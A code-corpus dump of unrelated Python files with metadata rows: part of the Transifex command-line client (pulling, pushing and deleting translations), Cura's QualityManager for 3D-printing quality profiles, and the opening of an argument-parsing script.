def _save_tx_config(self, config=None):
"""Save the local config file."""
if config is None:
config = self.config
fh = open(self.config_file,"w")
config.write(fh)
fh.close()
def _save_txrc_file(self, txrc=None):
"""Save the .transifexrc file."""
if txrc is None:
txrc = self.txrc
mask = os.umask(0o077)
fh = open(self.txrc_file, 'w')
txrc.write(fh)
fh.close()
os.umask(mask)
def get_full_path(self, relpath):
if relpath[0] == os.path.sep:
return relpath
else:
return os.path.join(self.root, relpath)
def _get_pseudo_file(self, slang, resource, file_filter):
pseudo_file = file_filter.replace('<lang>', '%s_pseudo' % slang)
return native_path(pseudo_file)
def pull(self, languages=[], resources=[], overwrite=True, fetchall=False,
fetchsource=False, force=False, skip=False, minimum_perc=0, mode=None,
pseudo=False):
"""Pull all translations file from transifex server."""
self.minimum_perc = minimum_perc
resource_list = self.get_chosen_resources(resources)
if mode == 'reviewed':
url = 'pull_reviewed_file'
elif mode == 'translator':
url = 'pull_translator_file'
elif mode == 'developer':
url = 'pull_developer_file'
else:
url = 'pull_file'
for resource in resource_list:
logger.debug("Handling resource %s" % resource)
self.resource = resource
project_slug, resource_slug = resource.split('.', 1)
files = self.get_resource_files(resource)
slang = self.get_resource_option(resource, 'source_lang')
sfile = self.get_source_file(resource)
lang_map = self.get_resource_lang_mapping(resource)
host = self.get_resource_host(resource)
logger.debug("Language mapping is: %s" % lang_map)
if mode is None:
mode = self._get_option(resource, 'mode')
self.url_info = {
'host': host,
'project': project_slug,
'resource': resource_slug
}
logger.debug("URL data are: %s" % self.url_info)
stats = self._get_stats_for_resource()
try:
file_filter = self.config.get(resource, 'file_filter')
except configparser.NoOptionError:
file_filter = None
# Pull source file
pull_languages = set([])
new_translations = set([])
if pseudo:
pseudo_file = self._get_pseudo_file(
slang, resource, file_filter
)
if self._should_download(slang, stats, local_file=pseudo_file):
logger.info("Pulling pseudo file for resource %s (%s)." % (
resource,
color_text(pseudo_file, "RED")
))
self._download_pseudo(
project_slug, resource_slug, pseudo_file
)
if not languages:
continue
if fetchall:
new_translations = self._new_translations_to_add(
files, slang, lang_map, stats, force
)
if new_translations:
msg = "New translations found for the following languages: %s"
logger.info(msg % ', '.join(new_translations))
existing, new = self._languages_to_pull(
languages, files, lang_map, stats, force
)
pull_languages |= existing
new_translations |= new
logger.debug("Adding to new translations: %s" % new)
if fetchsource:
if sfile and slang not in pull_languages:
pull_languages.add(slang)
elif slang not in new_translations:
new_translations.add(slang)
if pull_languages:
logger.debug("Pulling languages for: %s" % pull_languages)
msg = "Pulling translations for resource %s (source: %s)"
logger.info(msg % (resource, sfile))
for lang in pull_languages:
local_lang = lang
if lang in list(lang_map.values()):
remote_lang = lang_map.flip[lang]
else:
remote_lang = lang
if languages and lang not in pull_languages:
logger.debug("Skipping language %s" % lang)
continue
if lang != slang:
local_file = files.get(lang, None) or files[lang_map[lang]]
else:
local_file = sfile
logger.debug("Using file %s" % local_file)
kwargs = {
'lang': remote_lang,
'stats': stats,
'local_file': local_file,
'force': force,
'mode': mode,
}
if not self._should_update_translation(**kwargs):
msg = "Skipping '%s' translation (file: %s)."
logger.info(
msg % (color_text(remote_lang, "RED"), local_file)
)
continue
if not overwrite:
local_file = ("%s.new" % local_file)
logger.warning(
" -> %s: %s" % (color_text(remote_lang, "RED"), local_file)
)
try:
r, charset = self.do_url_request(url, language=remote_lang)
except Exception as e:
if isinstance(e, SSLError) or not skip:
raise
else:
logger.error(e)
continue
base_dir = os.path.split(local_file)[0]
mkdir_p(base_dir)
fd = open(local_file, 'wb')
fd.write(r.encode(charset))
fd.close()
if new_translations:
msg = "Pulling new translations for resource %s (source: %s)"
logger.info(msg % (resource, sfile))
for lang in new_translations:
if lang in list(lang_map.keys()):
local_lang = lang_map[lang]
else:
local_lang = lang
remote_lang = lang
if file_filter:
local_file = os.path.relpath(
os.path.join(
self.root, native_path(
file_filter.replace('<lang>', local_lang)
)
), os.curdir
)
else:
trans_dir = os.path.join(self.root, ".tx", resource)
if not os.path.exists(trans_dir):
os.mkdir(trans_dir)
local_file = os.path.relpath(os.path.join(trans_dir, '%s_translation' %
local_lang, os.curdir))
if lang != slang:
satisfies_min = self._satisfies_min_translated(
stats[remote_lang], mode
)
if not satisfies_min:
msg = "Skipping language %s due to used options."
logger.info(msg % lang)
continue
logger.warning(
" -> %s: %s" % (color_text(remote_lang, "RED"), local_file)
)
r, charset = self.do_url_request(url, language=remote_lang)
base_dir = os.path.split(local_file)[0]
mkdir_p(base_dir)
fd = open(local_file, 'wb')
fd.write(r.encode(charset))
fd.close()
def push(self, source=False, translations=False, force=False, resources=[], languages=[],
skip=False, no_interactive=False):
"""
Push all the resources
"""
resource_list = self.get_chosen_resources(resources)
self.skip = skip
self.force = force
for resource in resource_list:
push_languages = []
project_slug, resource_slug = resource.split('.', 1)
files = self.get_resource_files(resource)
slang = self.get_resource_option(resource, 'source_lang')
sfile = self.get_source_file(resource)
lang_map = self.get_resource_lang_mapping(resource)
host = self.get_resource_host(resource)
logger.debug("Language mapping is: %s" % lang_map)
logger.debug("Using host %s" % host)
self.url_info = {
'host': host,
'project': project_slug,
'resource': resource_slug
}
logger.info("Pushing translations for resource %s:" % resource)
stats = self._get_stats_for_resource()
if force and not no_interactive:
answer = input("Warning: By using --force, the uploaded"
" files will overwrite remote translations, even if they"
" are newer than your uploaded files.\nAre you sure you"
" want to continue? [y/N] ")
if not answer in ["", 'Y', 'y', "yes", 'YES']:
return
if source:
if sfile is None:
logger.error("You don't seem to have a proper source file"
" mapping for resource %s. Try without the --source"
" option or set a source file first and then try again." %
resource)
continue
# Push source file
try:
logger.warning("Pushing source file (%s)" % sfile)
if not self._resource_exists(stats):
logger.info("Resource does not exist. Creating...")
fileinfo = "%s;%s" % (resource_slug, slang)
filename = self.get_full_path(sfile)
self._create_resource(resource, project_slug, fileinfo, filename)
self.do_url_request(
'push_source', multipart=True, method="PUT",
files=[(
"%s;%s" % (resource_slug, slang)
, self.get_full_path(sfile)
)],
)
except Exception as e:
if isinstance(e, SSLError) or not skip:
raise
else:
logger.error(e)
else:
try:
self.do_url_request('resource_details')
except Exception as e:
if isinstance(e, SSLError):
raise
code = getattr(e, 'code', None)
if code == 404:
msg = "Resource %s doesn't exist on the server."
logger.error(msg % resource)
continue
if translations:
# Check if given language codes exist
if not languages:
push_languages = list(files.keys())
else:
push_languages = []
f_langs = list(files.keys())
for l in languages:
if l in list(lang_map.keys()):
l = lang_map[l]
push_languages.append(l)
if l not in f_langs:
msg = "Warning: No mapping found for language code '%s'."
logger.error(msg % color_text(l,"RED"))
logger.debug("Languages to push are %s" % push_languages)
# Push translation files one by one
for lang in push_languages:
local_lang = lang
if lang in list(lang_map.values()):
remote_lang = lang_map.flip[lang]
else:
remote_lang = lang
local_file = files[local_lang]
kwargs = {
'lang': remote_lang,
'stats': stats,
'local_file': local_file,
'force': force,
}
if not self._should_push_translation(**kwargs):
msg = "Skipping '%s' translation (file: %s)."
logger.info(msg % (color_text(lang, "RED"), local_file))
continue
msg = "Pushing '%s' translations (file: %s)"
logger.warning(
msg % (color_text(remote_lang, "RED"), local_file)
)
try:
self.do_url_request(
'push_translation', multipart=True, method='PUT',
files=[(
"%s;%s" % (resource_slug, remote_lang),
self.get_full_path(local_file)
)], language=remote_lang
)
logger.debug("Translation %s pushed." % remote_lang)
except HttpNotFound:
if not source:
logger.error("Resource hasn't been created. Try pushing source file.")
except Exception as e:
if isinstance(e, SSLError) or not skip:
raise
else:
logger.error(e)
def delete(self, resources=[], languages=[], skip=False, force=False):
"""Delete translations."""
resource_list = self.get_chosen_resources(resources)
self.skip = skip
self.force = force
if not languages:
delete_func = self._delete_resource
else:
delete_func = self._delete_translations
for resource in resource_list:
project_slug, resource_slug = resource.split('.', 1)
host = self.get_resource_host(resource)
self.url_info = {
'host': host,
'project': project_slug,
'resource': resource_slug
}
logger.debug("URL data are: %s" % self.url_info)
json, _ = self.do_url_request('project_details', project=self)
project_details = parse_json(json)
teams = project_details['teams']
stats = self._get_stats_for_resource()
delete_func(project_details, resource, stats, languages)
def _delete_resource(self, project_details, resource, stats, *args):
"""Delete a resource from Transifex."""
project_slug, resource_slug = resource.split('.', 1)
project_resource_slugs = [
r['slug'] for r in project_details['resources']
]
logger.info("Deleting resource %s:" % resource)
if resource_slug not in project_resource_slugs:
if not self.skip:
msg = "Skipping: %s : Resource does not exist."
logger.info(msg % resource)
return
if not self.force:
slang = self.get_resource_option(resource, 'source_lang')
for language in stats:
if language == slang:
continue
if int(stats[language]['translated_entities']) > 0:
msg = (
"Skipping: %s : Unable to delete resource because it "
"has a not empty %s translation.\nPlease use -f or "
"--force option to delete this resource."
)
logger.info(msg % (resource, language))
return
try:
self.do_url_request('delete_resource', method="DELETE")
self.config.remove_section(resource)
self.save()
msg = "Deleted resource %s of project %s."
logger.info(msg % (resource_slug, project_slug))
except Exception as e:
msg = "Unable to delete resource %s of project %s."
logger.error(msg % (resource_slug, project_slug))
if isinstance(e, SSLError) or not self.skip:
raise
def _delete_translations(self, project_details, resource, stats, languages):
"""Delete the specified translations for the specified resource."""
logger.info("Deleting translations from resource %s:" % resource)
for language in languages:
self._delete_translation(project_details, resource, stats, language)
def _delete_translation(self, project_details, resource, stats, language):
"""Delete a specific translation from the specified resource."""
project_slug, resource_slug = resource.split('.', 1)
if language not in stats:
if not self.skip:
msg = "Skipping %s: Translation does not exist."
logger.warning(msg % (language))
return
if not self.force:
teams = project_details['teams']
if language in teams:
msg = (
"Skipping %s: Unable to delete translation because it is "
"associated with a team.\nPlease use -f or --force option "
"to delete this translation."
)
logger.warning(msg % language)
return
if int(stats[language]['translated_entities']) > 0:
msg = (
"Skipping %s: Unable to delete translation because it "
"is not empty.\nPlease use -f or --force option to delete "
"this translation."
)
logger.warning(msg % language)
return
try:
self.do_url_request(
'delete_translation', language=language, method="DELETE"
)
msg = "Deleted language %s from resource %s of project %s."
logger.info(msg % (language, resource_slug, project_slug))
except Exception as e:
msg = "Unable to delete translation %s"
logger.error(msg % language)
if isinstance(e, SSLError) or not self.skip:
raise
def do_url_request(self, api_call, multipart=False, data=None,
files=[], method="GET", **kwargs):
"""
Issues a url request.
"""
# Read the credentials from the config file (.transifexrc)
host = self.url_info['host']
try:
username = self.txrc.get(host, 'username')
passwd = self.txrc.get(host, 'password')
token = self.txrc.get(host, 'token')
hostname = self.txrc.get(host, 'hostname')
except configparser.NoSectionError:
raise Exception("No user credentials found for host %s. Edit"
" ~/.transifexrc and add the appropriate info in there." %
host)
# Create the Url
kwargs['hostname'] = hostname
kwargs.update(self.url_info)
url = API_URLS[api_call] % kwargs
if multipart:
for info, filename in files:
#FIXME: It works because we only pass to files argument
#only one item
name = os.path.basename(filename)
data = {
"resource": info.split(';')[0],
"language": info.split(';')[1],
"uploaded_file": (name, open(filename, 'rb').read())
}
return make_request(method, hostname, url, username, passwd, data)
def _should_update_translation(self, lang, stats, local_file, force=False,
mode=None):
"""Whether a translation should be udpated from Transifex.
We use the following criteria for that:
- If user requested to force the download.
- If language exists in Transifex.
- If the local file is older than the Transifex's file.
- If the user requested a x% completion.
Args:
lang: The language code to check.
stats: The (global) statistics object.
local_file: The local translation file.
force: A boolean flag.
mode: The mode for the translation.
Returns:
True or False.
"""
return self._should_download(lang, stats, local_file, force)
def _should_add_translation(self, lang, stats, force=False, mode=None):
"""Whether a translation should be added from Transifex.
We use the following criteria for that:
- If user requested to force the download.
- If language exists in Transifex.
- If the user requested a x% completion.
Args:
lang: The language code to check.
stats: The (global) statistics object.
force: A boolean flag.
mode: The mode for the translation.
Returns:
True or False.
"""
return self._should_download(lang, stats, None, force)
def _should_download(self, lang, stats, local_file=None, force=False,
mode=None):
"""Return whether a translation should be downloaded.
If local_file is None, skip the timestamps check (the file does
not exist locally).
"""
try:
lang_stats = stats[lang]
except KeyError as e:
logger.debug("No lang %s in statistics" % lang)
return False
satisfies_min = self._satisfies_min_translated(lang_stats, mode)
if not satisfies_min:
return False
if force:
logger.debug("Downloading translation due to -f")
return True
if local_file is not None:
remote_update = self._extract_updated(lang_stats)
if not self._remote_is_newer(remote_update, local_file):
logger.debug("Local is newer than remote for lang %s" % lang)
return False
return True
def _should_push_translation(self, lang, stats, local_file, force=False):
"""Return whether a local translation file should be
pushed to Trasnifex.
We use the following criteria for that:
- If user requested to force the upload.
- If language exists in Transifex.
- If local file is younger than the remote file.
Args:
lang: The language code to check.
stats: The (global) statistics object.
local_file: The local translation file.
force: A boolean flag.
Returns:
True or False.
"""
if force:
logger.debug("Push translation due to -f.")
return True
try:
lang_stats = stats[lang]
except KeyError as e:
logger.debug("Language %s does not exist in Transifex." % lang)
return True
if local_file is not None:
remote_update = self._extract_updated(lang_stats)
if self._remote_is_newer(remote_update, local_file):
msg = "Remote translation is newer than local file for lang %s"
logger.debug(msg % lang)
return False
return True
def _generate_timestamp(self, update_datetime):
"""Generate a UNIX timestamp from the argument.
Args:
update_datetime: The datetime in the format used by Transifex.
Returns:
A float, representing the timestamp that corresponds to the
argument.
"""
time_format = "%Y-%m-%d %H:%M:%S"
return time.mktime(
datetime.datetime(
*time.strptime(update_datetime, time_format)[0:5]
).utctimetuple()
)
def _get_time_of_local_file(self, path):
"""Get the modified time of the path_.
Args:
path: The path we want the mtime for.
Returns:
The time as a timestamp or None, if the file does not exist
"""
if not os.path.exists(path):
return None
return time.mktime(time.gmtime(os.path.getmtime(path)))
def _satisfies_min_translated(self, stats, mode=None):
"""Check whether a translation fulfills the filter used for
minimum translated percentage.
Args:
perc: The current translation percentage.
Returns:
True or False
"""
cur = self._extract_completed(stats, mode)
option_name = 'minimum_perc'
if self.minimum_perc is not None:
minimum_percent = self.minimum_perc
else:
global_minimum = int(
self.get_resource_option('main', option_name) or 0
)
resource_minimum = int(
self.get_resource_option(
self.resource, option_name
) or global_minimum
)
minimum_percent = resource_minimum
return cur >= minimum_percent
def _remote_is_newer(self, remote_updated, local_file):
"""Check whether the remote translation is newer that the local file.
Args:
remote_updated: The date and time the translation was last
updated remotely.
local_file: The local file.
Returns:
True or False.
"""
if remote_updated is None:
logger.debug("No remote time")
return False
remote_time = self._generate_timestamp(remote_updated)
local_time = self._get_time_of_local_file(
self.get_full_path(local_file)
)
logger.debug(
"Remote time is %s and local %s" % (remote_time, local_time)
)
if local_time is not None and remote_time < local_time:
return False
return True
@classmethod
def _extract_completed(cls, stats, mode=None):
"""Extract the information for the translated percentage from the stats.
Args:
stats: The stats object for a language as returned by Transifex.
mode: The mode of translations requested.
Returns:
The percentage of translation as integer.
"""
if mode == 'reviewed':
key = 'reviewed_percentage'
else:
key = 'completed'
try:
return int(stats[key][:-1])
except KeyError as e:
return 0
@classmethod
def _extract_updated(cls, stats):
"""Extract the information for the last update of a translation.
Args:
stats: The stats object for a language as returned by Transifex.
Returns:
The last update field.
"""
try:
return stats['last_update']
except KeyError as e:
return None
def _download_pseudo(self, project_slug, resource_slug, pseudo_file):
response, charset = self.do_url_request(
'pull_pseudo_file',
resource_slug=resource_slug,
project_slug=project_slug
)
response = parse_json(response)
base_dir = os.path.split(pseudo_file)[0]
mkdir_p(base_dir)
with open(pseudo_file, "wb") as fd:
fd.write(response['content'].encode("utf-8"))
def _new_translations_to_add(self, files, slang, lang_map,
stats, force=False):
"""Return a list of translations which are new to the
local installation.
"""
new_translations = []
timestamp = time.time()
langs = list(stats.keys())
logger.debug("Available languages are: %s" % langs)
for lang in langs:
lang_exists = lang in list(files.keys())
lang_is_source = lang == slang
mapped_lang_exists = (
lang in lang_map and lang_map[lang] in list(files.keys())
)
if lang_exists or lang_is_source or mapped_lang_exists:
continue
if self._should_add_translation(lang, stats, force):
new_translations.append(lang)
return set(new_translations)
def _get_stats_for_resource(self):
"""Get the statistics information for a resource."""
try:
r, charset = self.do_url_request('resource_stats')
logger.debug("Statistics response is %s" % r)
stats = parse_json(r)
except HttpNotFound:
logger.debug("Resource not found, creating...")
stats = {}
except Exception as e:
logger.debug(six.u(str(e)))
raise
return stats
def get_chosen_resources(self, resources):
"""Get the resources the user selected.
Support wildcards in the resources specified by the user.
Args:
resources: A list of resources as specified in command-line or
an empty list.
Returns:
A list of resources.
"""
configured_resources = self.get_resource_list()
if not resources:
return configured_resources
selected_resources = []
for resource in resources:
found = False
for full_name in configured_resources:
if fnmatch.fnmatch(full_name, resource):
selected_resources.append(full_name)
found = True
if not found:
msg = "Specified resource '%s' does not exist."
raise Exception(msg % resource)
logger.debug("Operating on resources: %s" % selected_resources)
return selected_resources
def _languages_to_pull(self, languages, files, lang_map, stats, force):
"""Get a set of langauges to pull.
Args:
languages: A list of languages the user selected in cmd.
files: A dictionary of current local translation files.
Returns:
A tuple of a set of existing languages and new translations.
"""
if not languages:
pull_languages = set([])
pull_languages |= set(files.keys())
mapped_files = []
for lang in pull_languages:
if lang in lang_map.flip:
mapped_files.append(lang_map.flip[lang])
pull_languages -= set(lang_map.flip.keys())
pull_languages |= set(mapped_files)
return (pull_languages, set([]))
else:
pull_languages = []
new_translations = []
f_langs = list(files.keys())
for l in languages:
if l not in f_langs and not (l in lang_map and lang_map[l] in f_langs):
if self._should_add_translation(l, stats, force):
new_translations.append(l)
else:
if l in list(lang_map.keys()):
l = lang_map[l]
pull_languages.append(l)
return (set(pull_languages), set(new_translations))
def _extension_for(self, i18n_type):
"""Return the extension used for the specified type."""
try:
json, charset = self.do_url_request('formats')
res = parse_json(json)
return res[i18n_type]['file-extensions'].split(',')[0]
except Exception as e:
logger.error(e)
return ''
def _resource_exists(self, stats):
"""Check if resource exists.
Args:
stats: The statistics dict as returned by Tx.
Returns:
True, if the resource exists in the server.
"""
return bool(stats)
def _create_resource(self, resource, pslug, fileinfo, filename, **kwargs):
"""Create a resource.
Args:
resource: The full resource name.
pslug: The slug of the project.
fileinfo: The information of the resource.
filename: The name of the file.
Raises:
URLError, in case of a problem.
"""
multipart = True
method = "POST"
api_call = 'create_resource'
host = self.url_info['host']
try:
username = self.txrc.get(host, 'username')
passwd = self.txrc.get(host, 'password')
token = self.txrc.get(host, 'token')
hostname = self.txrc.get(host, 'hostname')
except configparser.NoSectionError:
raise Exception("No user credentials found for host %s. Edit"
" ~/.transifexrc and add the appropriate info in there." %
host)
# Create the Url
kwargs['hostname'] = hostname
kwargs.update(self.url_info)
kwargs['project'] = pslug
url = (API_URLS[api_call] % kwargs).encode('UTF-8')
i18n_type = self._get_option(resource, 'type')
if i18n_type is None:
raise Exception(
"Please define the resource type in .tx/config (eg. type = PO)."
" More info: http://bit.ly/txcl-rt"
)
data = {
"slug": fileinfo.split(';')[0],
"name": fileinfo.split(';')[0],
"uploaded_file": (filename, open(filename, 'rb').read()),
"i18n_type": i18n_type
}
r, charset = make_request(method, hostname, url, username, passwd, data)
return r
def _get_option(self, resource, option):
"""Get the value for the option in the config file.
If the option is not in the resource section, look for it in
the project.
Args:
resource: The resource name.
option: The option the value of which we are interested in.
Returns:
The option value or None, if it does not exist.
"""
value = self.get_resource_option(resource, option)
if value is None:
if self.config.has_option('main', option):
return self.config.get('main', option)
return value
def set_i18n_type(self, resources, i18n_type):
"""Set the type for the specified resources."""
self._set_resource_option(resources, key='type', value=i18n_type)
def set_min_perc(self, resources, perc):
"""Set the minimum percentage for the resources."""
self._set_resource_option(resources, key='minimum_perc', value=perc)
def set_default_mode(self, resources, mode):
"""Set the default mode for the specified resources."""
self._set_resource_option(resources, key='mode', value=mode)
def _set_resource_option(self, resources, key, value):
"""Set options in the config file.
If resources is empty. set the option globally.
"""
if not resources:
self.config.set('main', key, value)
return
for r in resources:
self.config.set(r, key, value)
| agpl-3.0 | -8,030,408,997,415,867,000 | 37.611111 | 98 | 0.519301 | false |
hmflash/Cura | cura/QualityManager.py | 1 | 16324 | # Copyright (c) 2016 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
# This collects a lot of quality and quality changes related code which was split between ContainerManager
# and the MachineManager and really needs to usable from both.
from typing import List
from UM.Application import Application
from UM.Settings.ContainerRegistry import ContainerRegistry
from UM.Settings.DefinitionContainer import DefinitionContainer
from UM.Settings.InstanceContainer import InstanceContainer
from cura.Settings.ExtruderManager import ExtruderManager
class QualityManager:
## Get the singleton instance for this class.
@classmethod
def getInstance(cls) -> "QualityManager":
# Note: Explicit use of class name to prevent issues with inheritance.
if not QualityManager.__instance:
QualityManager.__instance = cls()
return QualityManager.__instance
__instance = None # type: "QualityManager"
## Find a quality by name for a specific machine definition and materials.
#
# \param quality_name
# \param machine_definition (Optional) \type{ContainerInstance} If nothing is
# specified then the currently selected machine definition is used.
# \param material_containers (Optional) \type{List[ContainerInstance]} If nothing is specified then
# the current set of selected materials is used.
# \return the matching quality container \type{ContainerInstance}
def findQualityByName(self, quality_name, machine_definition=None, material_containers=None):
criteria = {"type": "quality", "name": quality_name}
result = self._getFilteredContainersForStack(machine_definition, material_containers, **criteria)
# Fall back to using generic materials and qualities if nothing could be found.
if not result and material_containers and len(material_containers) == 1:
basic_materials = self._getBasicMaterials(material_containers[0])
result = self._getFilteredContainersForStack(machine_definition, basic_materials, **criteria)
return result[0] if result else None
## Find a quality changes container by name.
#
# \param quality_changes_name \type{str} the name of the quality changes container.
# \param machine_definition (Optional) \type{ContainerInstance} If nothing is
# specified then the currently selected machine definition is used.
# \param material_containers (Optional) \type{List[ContainerInstance]} If nothing is specified then
# the current set of selected materials is used.
# \return the matching quality changes containers \type{List[ContainerInstance]}
def findQualityChangesByName(self, quality_changes_name, machine_definition=None):
criteria = {"type": "quality_changes", "name": quality_changes_name}
result = self._getFilteredContainersForStack(machine_definition, [], **criteria)
return result
## Fetch the list of available quality types for this combination of machine definition and materials.
#
# \param machine_definition \type{DefinitionContainer}
# \param material_containers \type{List[InstanceContainer]}
# \return \type{List[str]}
def findAllQualityTypesForMachineAndMaterials(self, machine_definition, material_containers):
# Determine the common set of quality types which can be
# applied to all of the materials for this machine.
quality_type_dict = self.__fetchQualityTypeDictForMaterial(machine_definition, material_containers[0])
common_quality_types = set(quality_type_dict.keys())
for material_container in material_containers[1:]:
next_quality_type_dict = self.__fetchQualityTypeDictForMaterial(machine_definition, material_container)
common_quality_types.intersection_update(set(next_quality_type_dict.keys()))
return list(common_quality_types)
## Fetches a dict of quality types names to quality profiles for a combination of machine and material.
#
# \param machine_definition \type{DefinitionContainer} the machine definition.
# \param material \type{ContainerInstance} the material.
# \return \type{Dict[str, ContainerInstance]} the dict of suitable quality type names mapping to qualities.
def __fetchQualityTypeDictForMaterial(self, machine_definition, material):
qualities = self.findAllQualitiesForMachineMaterial(machine_definition, material)
quality_type_dict = {}
for quality in qualities:
quality_type_dict[quality.getMetaDataEntry("quality_type")] = quality
return quality_type_dict
## Find a quality container by quality type.
#
# \param quality_type \type{str} the name of the quality type to search for.
# \param machine_definition (Optional) \type{ContainerInstance} If nothing is
# specified then the currently selected machine definition is used.
# \param material_containers (Optional) \type{List[ContainerInstance]} If nothing is specified then
# the current set of selected materials is used.
# \return the matching quality container \type{ContainerInstance}
def findQualityByQualityType(self, quality_type, machine_definition=None, material_containers=None, **kwargs):
criteria = kwargs
criteria["type"] = "quality"
if quality_type:
criteria["quality_type"] = quality_type
result = self._getFilteredContainersForStack(machine_definition, material_containers, **criteria)
# Fall back to using generic materials and qualities if nothing could be found.
if not result and material_containers and len(material_containers) == 1:
basic_materials = self._getBasicMaterials(material_containers[0])
result = self._getFilteredContainersForStack(machine_definition, basic_materials, **criteria)
return result[0] if result else None
## Find all suitable qualities for a combination of machine and material.
#
# \param machine_definition \type{DefinitionContainer} the machine definition.
# \param material_container \type{ContainerInstance} the material.
# \return \type{List[ContainerInstance]} the list of suitable qualities.
def findAllQualitiesForMachineMaterial(self, machine_definition, material_container):
criteria = {"type": "quality" }
result = self._getFilteredContainersForStack(machine_definition, [material_container], **criteria)
if not result:
basic_materials = self._getBasicMaterials(material_container)
result = self._getFilteredContainersForStack(machine_definition, basic_materials, **criteria)
return result
## Find all quality changes for a machine.
#
# \param machine_definition \type{DefinitionContainer} the machine definition.
# \return \type{List[InstanceContainer]} the list of quality changes
def findAllQualityChangesForMachine(self, machine_definition: DefinitionContainer) -> List[InstanceContainer]:
if machine_definition.getMetaDataEntry("has_machine_quality"):
definition_id = machine_definition.getId()
else:
definition_id = "fdmprinter"
filter_dict = { "type": "quality_changes", "extruder": None, "definition": definition_id }
quality_changes_list = ContainerRegistry.getInstance().findInstanceContainers(**filter_dict)
return quality_changes_list
## Find all usable qualities for a machine and extruders.
#
# Finds all of the qualities for this combination of machine and extruders.
# Only one quality per quality type is returned. i.e. if there are 2 qualities with quality_type=normal
# then only one of then is returned (at random).
#
# \param global_container_stack \type{ContainerStack} the global machine definition
# \param extruder_stacks \type{List[ContainerStack]} the list of extruder stacks
# \return \type{List[InstanceContainer]} the list of the matching qualities. The quality profiles
# return come from the first extruder in the given list of extruders.
def findAllUsableQualitiesForMachineAndExtruders(self, global_container_stack, extruder_stacks):
global_machine_definition = global_container_stack.getBottom()
if extruder_stacks:
# Multi-extruder machine detected.
materials = [stack.findContainer(type="material") for stack in extruder_stacks]
else:
# Machine with one extruder.
materials = [global_container_stack.findContainer(type="material")]
quality_types = self.findAllQualityTypesForMachineAndMaterials(global_machine_definition, materials)
# Map the list of quality_types to InstanceContainers
qualities = self.findAllQualitiesForMachineMaterial(global_machine_definition, materials[0])
quality_type_dict = {}
for quality in qualities:
quality_type_dict[quality.getMetaDataEntry("quality_type")] = quality
return [quality_type_dict[quality_type] for quality_type in quality_types]
## Fetch more basic versions of a material.
#
# This tries to find a generic or basic version of the given material.
# \param material_container \type{InstanceContainer} the material
# \return \type{List[InstanceContainer]} a list of the basic materials or an empty list if one could not be found.
def _getBasicMaterials(self, material_container):
base_material = material_container.getMetaDataEntry("material")
material_container_definition = material_container.getDefinition()
if material_container_definition and material_container_definition.getMetaDataEntry("has_machine_quality"):
definition_id = material_container.getDefinition().getMetaDataEntry("quality_definition", material_container.getDefinition().getId())
else:
definition_id = "fdmprinter"
if base_material:
# There is a basic material specified
criteria = { "type": "material", "name": base_material, "definition": definition_id }
containers = ContainerRegistry.getInstance().findInstanceContainers(**criteria)
containers = [basic_material for basic_material in containers if
basic_material.getMetaDataEntry("variant") == material_container.getMetaDataEntry(
"variant")]
return containers
return []
def _getFilteredContainers(self, **kwargs):
return self._getFilteredContainersForStack(None, None, **kwargs)
def _getFilteredContainersForStack(self, machine_definition=None, material_containers=None, **kwargs):
# Fill in any default values.
if machine_definition is None:
machine_definition = Application.getInstance().getGlobalContainerStack().getBottom()
quality_definition_id = machine_definition.getMetaDataEntry("quality_definition")
if quality_definition_id is not None:
machine_definition = ContainerRegistry.getInstance().findDefinitionContainers(id=quality_definition_id)[0]
if material_containers is None:
active_stacks = ExtruderManager.getInstance().getActiveGlobalAndExtruderStacks()
material_containers = [stack.findContainer(type="material") for stack in active_stacks]
criteria = kwargs
filter_by_material = False
machine_definition = self.getParentMachineDefinition(machine_definition)
whole_machine_definition = self.getWholeMachineDefinition(machine_definition)
if whole_machine_definition.getMetaDataEntry("has_machine_quality"):
definition_id = machine_definition.getMetaDataEntry("quality_definition", whole_machine_definition.getId())
criteria["definition"] = definition_id
filter_by_material = whole_machine_definition.getMetaDataEntry("has_materials")
else:
criteria["definition"] = "fdmprinter"
# Stick the material IDs in a set
if material_containers is None or len(material_containers) == 0:
filter_by_material = False
else:
material_ids = set()
for material_instance in material_containers:
if material_instance is not None:
# Add the parent material too.
for basic_material in self._getBasicMaterials(material_instance):
material_ids.add(basic_material.getId())
material_ids.add(material_instance.getId())
containers = ContainerRegistry.getInstance().findInstanceContainers(**criteria)
result = []
for container in containers:
# If the machine specifies we should filter by material, exclude containers that do not match any active material.
if filter_by_material and container.getMetaDataEntry("material") not in material_ids and not "global_quality" in kwargs:
continue
result.append(container)
return result
## Get the parent machine definition of a machine definition.
#
# \param machine_definition \type{DefinitionContainer} This may be a normal machine definition or
# an extruder definition.
# \return \type{DefinitionContainer} the parent machine definition. If the given machine
# definition doesn't have a parent then it is simply returned.
def getParentMachineDefinition(self, machine_definition: DefinitionContainer) -> DefinitionContainer:
container_registry = ContainerRegistry.getInstance()
machine_entry = machine_definition.getMetaDataEntry("machine")
if machine_entry is None:
# We have a normal (whole) machine defintion
quality_definition = machine_definition.getMetaDataEntry("quality_definition")
if quality_definition is not None:
parent_machine_definition = container_registry.findDefinitionContainers(id=quality_definition)[0]
return self.getParentMachineDefinition(parent_machine_definition)
else:
return machine_definition
else:
# This looks like an extruder. Find the rest of the machine.
whole_machine = container_registry.findDefinitionContainers(id=machine_entry)[0]
parent_machine = self.getParentMachineDefinition(whole_machine)
if whole_machine is parent_machine:
# This extruder already belongs to a 'parent' machine def.
return machine_definition
else:
# Look up the corresponding extruder definition in the parent machine definition.
extruder_position = machine_definition.getMetaDataEntry("position")
parent_extruder_id = parent_machine.getMetaDataEntry("machine_extruder_trains")[extruder_position]
return container_registry.findDefinitionContainers(id=parent_extruder_id)[0]
## Get the whole/global machine definition from an extruder definition.
#
# \param machine_definition \type{DefinitionContainer} This may be a normal machine definition or
# an extruder definition.
# \return \type{DefinitionContainer}
def getWholeMachineDefinition(self, machine_definition):
machine_entry = machine_definition.getMetaDataEntry("machine")
if machine_entry is None:
# This already is a 'global' machine definition.
return machine_definition
else:
container_registry = ContainerRegistry.getInstance()
whole_machine = container_registry.findDefinitionContainers(id=machine_entry)[0]
return whole_machine
| agpl-3.0 | -6,735,441,099,129,865,000 | 55.076923 | 145 | 0.678878 | false |
msyriac/orphics | bin/rot_recon.py | 1 | 4352 | from orphics.mpi import MPI
import orphics.pipelines as utils
import argparse
from enlib import enmap
# Parse command line
parser = argparse.ArgumentParser(description='Run south rotation test.')
parser.add_argument("-x", "--patch-width", type=float, default=40., help="Patch width in degrees.")
